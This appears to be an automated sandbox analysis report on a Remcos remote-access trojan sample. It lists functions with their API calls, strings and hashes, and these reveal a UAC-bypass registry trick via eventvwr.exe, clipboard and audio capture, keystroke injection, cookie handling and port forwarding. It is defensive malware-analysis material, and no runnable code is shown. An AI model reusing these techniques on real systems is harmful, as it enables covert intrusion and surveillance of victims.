            • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
            • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
            • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
            • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
            Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
            Download Yara Rule
            APIs
            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • Sleep.KERNEL32(00000064), ref: 00415A46
            • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CreateDeleteExecuteShellSleep
            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
            • API String ID: 1462127192-2001430897
            • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
            • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
            • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
            • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
            Function 004066A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
            Download Yara Rule
            APIs
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
            • ExitProcess.KERNEL32 ref: 00406782
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExecuteExitProcessShell
            • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
            • API String ID: 1124553745-1488154373
            • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
            • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
            • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
            • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
            Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
            Download Yara Rule
            APIs
            • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
            • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AllocConsoleShowWindow
            • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
            • API String ID: 4118500197-4025029772
            • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
            • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
            • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
            • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
            Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
            Download Yara Rule
            APIs
            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
              • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
              • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
              • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
            • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
            • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
            • TranslateMessage.USER32(?), ref: 0041B29E
            • DispatchMessageA.USER32(?), ref: 0041B2A8
            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
            • String ID: Remcos
            • API String ID: 1970332568-165870891
            • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
            • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
            • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
            • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
            Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
            • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
            • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
            • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
            Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
            Download Yara Rule
            APIs
            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
            • __alloca_probe_16.LIBCMT ref: 004510CA
            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
            • __alloca_probe_16.LIBCMT ref: 00451174
            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
            • __freea.LIBCMT ref: 004511E3
            • __freea.LIBCMT ref: 004511EF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
            • String ID:
            • API String ID: 201697637-0
            • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
            • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
            • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
            • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
            Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • _memcmp.LIBVCRUNTIME ref: 00442935
            • _free.LIBCMT ref: 004429A6
            • _free.LIBCMT ref: 004429BF
            • _free.LIBCMT ref: 004429F1
            • _free.LIBCMT ref: 004429FA
            • _free.LIBCMT ref: 00442A06
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorLast$_abort_memcmp
            • String ID: C
            • API String ID: 1679612858-1037565863
            • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
            • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
            • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
            • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
            Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: tcp$udp
            • API String ID: 0-3725065008
            • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
            • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
            • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
            • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
            Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Eventinet_ntoa
            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
            • API String ID: 3578746661-168337528
            • Opcode ID: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
            • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
            • Opcode Fuzzy Hash: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
            • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
            Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
              • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
              • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
            • String ID: .part
            • API String ID: 1303771098-3499674018
            • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
            • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
            • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
            • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
            Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
            • __alloca_probe_16.LIBCMT ref: 00447056
            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
            • __alloca_probe_16.LIBCMT ref: 0044713B
            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
            • __freea.LIBCMT ref: 004471AB
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • __freea.LIBCMT ref: 004471B4
            • __freea.LIBCMT ref: 004471D9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
            • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
            • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
            • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
            Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
            Download Yara Rule
            APIs
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
            • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: InputSend
            • String ID:
            • API String ID: 3431551938-0
            • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
            • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
            • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
            • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
            Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
            Download Yara Rule
            APIs
            • OpenClipboard.USER32 ref: 00414F41
            • EmptyClipboard.USER32 ref: 00414F4F
            • CloseClipboard.USER32 ref: 00414F55
            • OpenClipboard.USER32 ref: 00414F5C
            • GetClipboardData.USER32(0000000D), ref: 00414F6C
            • GlobalLock.KERNEL32(00000000), ref: 00414F75
            • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
            • CloseClipboard.USER32 ref: 00414F84
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
            • String ID:
            • API String ID: 2172192267-0
            • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
            • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
            • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
            • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
            Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
            • __fassign.LIBCMT ref: 00447814
            • __fassign.LIBCMT ref: 0044782F
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
            • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
            • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
            • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
            • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
            • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
            Function 00453DF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free
            • String ID: $-E$$-E
            • API String ID: 269201875-3140958853
            • Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
            • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
            • Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
            • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
            Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
            Download Yara Rule
            APIs
            • _strftime.LIBCMT ref: 00401D30
              • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
            • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
            • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
            • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
            • String ID: %Y-%m-%d %H.%M$.wav
            • API String ID: 3809562944-3597965672
            • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
            • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
            • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
            • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
            Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
              • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
              • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
            • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
            • API String ID: 1133728706-4073444585
            • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
            • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
            • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
            • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
            Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
            • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
            • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
            • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
            Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
            • _free.LIBCMT ref: 0044E128
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 0044E133
            • _free.LIBCMT ref: 0044E13E
            • _free.LIBCMT ref: 0044E192
            • _free.LIBCMT ref: 0044E19D
            • _free.LIBCMT ref: 0044E1A8
            • _free.LIBCMT ref: 0044E1B3
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
            • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
            • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
            • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
            Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
              • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
              • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
              • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
            • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCurrentOpenProcessQueryValue
            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
            • API String ID: 1866151309-2070987746
            • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
            • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
            • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
            • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
